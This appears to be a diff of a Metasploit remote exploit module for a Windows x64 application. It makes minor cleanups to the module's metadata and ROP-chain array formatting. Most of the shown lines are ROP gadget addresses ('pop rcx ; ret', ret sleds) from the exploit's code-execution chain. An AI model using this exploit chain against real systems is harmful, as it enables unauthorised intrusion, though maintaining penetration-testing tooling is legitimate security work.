@@ -41,7 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'DisableNops' => true
         },
         'Platform' => 'win',
-        'Arch' => ARCH_X64,
         'Targets' => [
           [
             'Windows Universal (x64) - v7.80.3132',
@@ -179,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
       0x0000000000000000, #
       0x0000000000000000, #
       0x0000000000000000
-    ] #
+    ]
     rop_gadgets += [0x0000000140018c42] * 10 # ret
     rop_gadgets += [
       0x0000000140131643, # pop rcx ; ret
@@ -212,7 +211,7 @@ class MetasploitModule < Msf::Exploit::Remote
       0x0000000000000000, #
       0x0000000000000000, #
       0x0000000000000000
-    ] #
+    ]
     rop_gadgets += [0x0000000140018c42] * 10 # ret
     rop_gadgets += [
       0x0000000140131643, # pop rcx ; ret
@@ -232,7 +231,7 @@ class MetasploitModule < Msf::Exploit::Remote
       0x0000000000000000, #
       0x0000000000000000, #
       0x0000000000000000
-    ] #
+    ]
     rop_gadgets += [0x0000000140018c42] * 6 # ret
     rop_gadgets += [
       0x0000000140002ef6, # pop rax ; ret
@@ -266,7 +265,7 @@ class MetasploitModule < Msf::Exploit::Remote
       0x0000000000000000, #
       0x0000000000000000, #
       0x0000000000000000
-    ] #
+    ]
     rop_gadgets += [0x0000000140018c42] * 10 # ret
     rop_gadgets += [
       0x0000000140131643, # pop rcx ; ret
@@ -300,7 +299,7 @@ class MetasploitModule < Msf::Exploit::Remote
       0x0000000000000000, #
       0x0000000000000000, #
       0x0000000000000000
-    ] #
+    ]
     rop_gadgets += [0x0000000140018c42] * 10 # ret
     rop_gadgets += [
       0x0000000140131643, # pop rcx ; ret
